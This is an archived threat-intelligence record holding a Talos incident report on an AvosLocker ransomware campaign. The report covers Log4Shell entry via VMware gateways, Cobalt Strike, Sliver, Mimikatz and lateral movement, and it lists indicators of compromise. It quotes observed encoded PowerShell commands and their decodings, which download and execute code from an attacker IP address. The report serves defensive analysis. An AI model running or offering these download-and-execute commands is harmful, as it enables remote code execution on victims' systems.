{
	"id": "5cb79e53-ba7c-458b-b9ac-fe77ebbc93a9",
	"created_at": "2026-04-06T01:31:17.840004Z",
	"updated_at": "2026-04-10T13:12:24.713248Z",
	"deleted_at": null,
	"sha1_hash": "27dab08356e39f33624f2df77f9bd3ecf965a1c9",
	"title": "Avos ransomware group expands with new attack arsenal",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 238838,
	"plain_text": "Avos ransomware group expands with new attack arsenal\r\nBy Chris Neal\r\nPublished: 2022-06-21 · Archived: 2026-04-06 00:42:41 UTC\r\nTuesday, June 21, 2022 07:58\r\nBy Flavio Costa,\r\nIn a recent customer engagement, we observed a month-long AvosLocker campaign.\r\nThe attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network\r\nscanners.\r\nThe initial ingress point in this incident was a pair of VMware Horizon Unified Access Gateways that were\r\nvulnerable to Log4Shell. While Cisco products were deployed on the network, the appliances were never configured,\r\nallowing the attacker to gain access to internal servers and maintain a foothold.\r\nDuring the time the attacker was active in the network, several security events were detected by the security products\r\nbut were not reviewed by the security team, which could have prevented the ransomware activity.\r\nThreat Actor Profile: Avos\r\nAvos is a ransomware group first identified in 2021 initially targeting Windows machines. More recently, a new ransomware\r\nvariant of AvosLocker, named after the group, is also targeting Linux environments. Well-funded and financially motivated,\r\nAvos has been active since June 2021 and follows the ransomware-as-a-service (RaaS) model, an affiliate program to recruit\r\npotential partners. The announcement of the program includes information about the features of the ransomware and lets\r\naffiliates know that AvosLocker operators will handle negotiation and extortion practices. The user \"Avos\" has also been\r\nobserved trying to recruit individuals on the Russian forum XSS.\r\nInitial vector\r\nTypically, Avos uses spam email campaigns as an initial infection vector to deliver ransomware. In this particular incident,\r\nhowever, the initial vector was an ESXi server exposed on the internet over VMware Horizon Unified Access Gateways\r\n(UAG), which was vulnerable to the Log4Shell vulnerability. 
The customer notified Talos on March 7, 2022, but noticed\r\nactivity related to the ransomware attack as far back as Feb. 7, 2022.\r\nSeveral vulnerabilities associated with Log4j, listed below, were found on this customer's UAG:\r\nCVE-2021-44228\r\nCVE-2021-45046\r\nCVE-2021-45105\r\nCVE-2021-44832\r\nThese vulnerabilities can potentially allow remote code execution on Unified Access Gateways by a low-privilege non-root\r\nuser named \"gateway\". Beyond that, the inner-transit firewalls that could control or limit the access to the internal\r\ninfrastructure were not configured; hence, the attackers used it as the initial access to establish a foothold on the customer's\r\nnetwork, granting access to their internal servers.\r\nThe victim in this case used Cisco Secure Endpoint (formerly known as Advanced Malware Protection) as its EPP/EDR\r\nsolution on most endpoints, from workstations to servers, which allowed Talos to collect important information about the\r\nhttps://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html\r\nPage 1 of 4\n\nentire attack lifecycle.\r\nAttack Timeline\r\nDuring the initial phases of the attack, the threat actor took numerous steps to gain a foothold on the victim network. Several\r\nother payloads and malicious tools were observed on endpoints, along with the utilization of living-off-the-land binaries\r\n(LoLBins).\r\nTalos observed the attackers using the WMI Provider Host (wmiprvse.exe) on a Windows Server that was the initial point of\r\nentry to run an encoded PowerShell script using the DownloadString method at 01:41 UTC on Feb. 11.\r\nThree days later, on Feb. 14, a retrospective detection was triggered for the RuntimeBrokerService.exe executable in\r\n\"C:\\Windows\\System32\\temp\\\" for creating a file called \"watcher.exe.\" These particular files may be artifacts from a\r\nseparate threat actor, as these files appear to be related to a cryptocurrency miner rather than AvosLocker. 
It is not\r\nuncommon for a miner to be deployed alongside ransomware in an attempt to passively increase revenue. However, there is\r\nsignificant evidence that multiple threat actors had compromised this network, as DarkComet samples unrelated to this\r\ncampaign were also discovered.\r\nApproximately four weeks later, on March 4, another encoded PowerShell command was executed, shown below, again\r\nutilizing the DownloadString method.\r\npowershell.exe -exec bypass -enc\r\naQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHKACWB0AGUAbQAuAEAZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKA\r\nDecoded:\r\niex (New-Object System.Net.WebClient).DownloadString('http://45[.]136[.]230[.]191:4000/D234R23');\r\nTwo days later on March 6, the attacker ran more PowerShell scripts to download and execute a Sliver payload labeled\r\n\"vmware_kb.exe\". As seen in their blog post regarding Sliver, Team Cymru has observed the deployment of this executable\r\nin a similar campaign. In the following days, several PowerShell scripts downloaded additional files, including Mimikatz\r\nand a .zip archive called \"IIS Temporary Compressed Files.zip\" containing Cobalt Strike beacons and a port scanner labeled\r\n\"scanner.exe.\" This port scanner is a commercially available product which Avos is known for deploying called SoftPerfect\r\nNetwork Scanner. 
Later that same day, the attackers utilized WMIC to modify administrative settings on both a local and a\r\nremote host, behavior that is indicative of the first stages of lateral movement.\r\nAnother PowerShell command observed on March 6, shown below, is an artifact from a Cobalt Strike beacon executing its\r\npowershell-import function:\r\npowershell -nop -exec bypass -EncodedCommand\r\nSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAAAuAFcAZQBiAGMAbAbABpAGUAbgB0ACkALgBEAG8A\r\ndwBuAGwAbwAgAUQAUWB0AHIAAQBuAGcAKAAAGgAdAB0AAAOgAvAC8AMQAyADcALgAwAC4AMAAAAAAAAGAzADIANAA2AdcA\r\nDecoded:\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:32467/')\r\nOn March 8, another instance of the SoftPerfect Network Scanner was transferred via AnyDesk to another server in the\r\nnetwork. Later that day, the AvosLocker payload was finally delivered, using the victim's company name as the filename.\r\nTo proliferate the ransomware and other tools across the target network, the attackers used PDQ Deploy, a legitimate\r\nsoftware deployment tool. Once the ransomware was delivered, the victim's files were then encrypted and a ransom note was\r\ndisplayed, shown below.\r\nConclusion\r\nThis incident showcases the importance of ensuring that security appliances are properly set up and configured, updates and\r\npatches are applied and the security team is always monitoring alerts. While the attack techniques used in this campaign are\r\nnot novel, they are still effective if the proper precautions are not in place.\r\nWith a highly motivated threat actor like Avos actively recruiting affiliates, these attacks are likely to proliferate in the\r\nfuture. Such attackers are constantly hunting for vulnerable networks and can infiltrate them with relative ease, sometimes\r\nby multiple threat actors, as seen in this particular case. 
A layered defense model is therefore imperative to detect, contain\r\nand protect against post-exploitation activity. While static and network-based detection is important, it should be\r\ncomplemented with properly configured system behavior analysis and endpoint protections.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in\r\nthis post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure\r\nproducts.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network. 
Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests\r\nsuspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are\r\ninfected with this specific threat. For specific OSqueries on this threat, click here and here.\r\nIoCs\r\nAvosLocker\r\nSliver\r\nMimikatz\r\nCobalt Strike artifacts\r\nsmb.ps1\r\nbeacon.ps1\r\nIIS Temporary Compressed Files.zip\r\nURLs\r\nhxxp[://]45[.]136[.]230[.]191:4000/D234R23\r\nIPs\r\n176[.]113[.]115[.]107\r\n45[.]136[.]230[.]191\r\nSource: https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html"
	],
	"report_names": [
		"avoslocker-new-arsenal.html"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775439077,
	"ts_updated_at": 1775826744,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/27dab08356e39f33624f2df77f9bd3ecf965a1c9.pdf",
		"text": "https://archive.orkl.eu/27dab08356e39f33624f2df77f9bd3ecf965a1c9.txt",
		"img": "https://archive.orkl.eu/27dab08356e39f33624f2df77f9bd3ecf965a1c9.jpg"
	}
}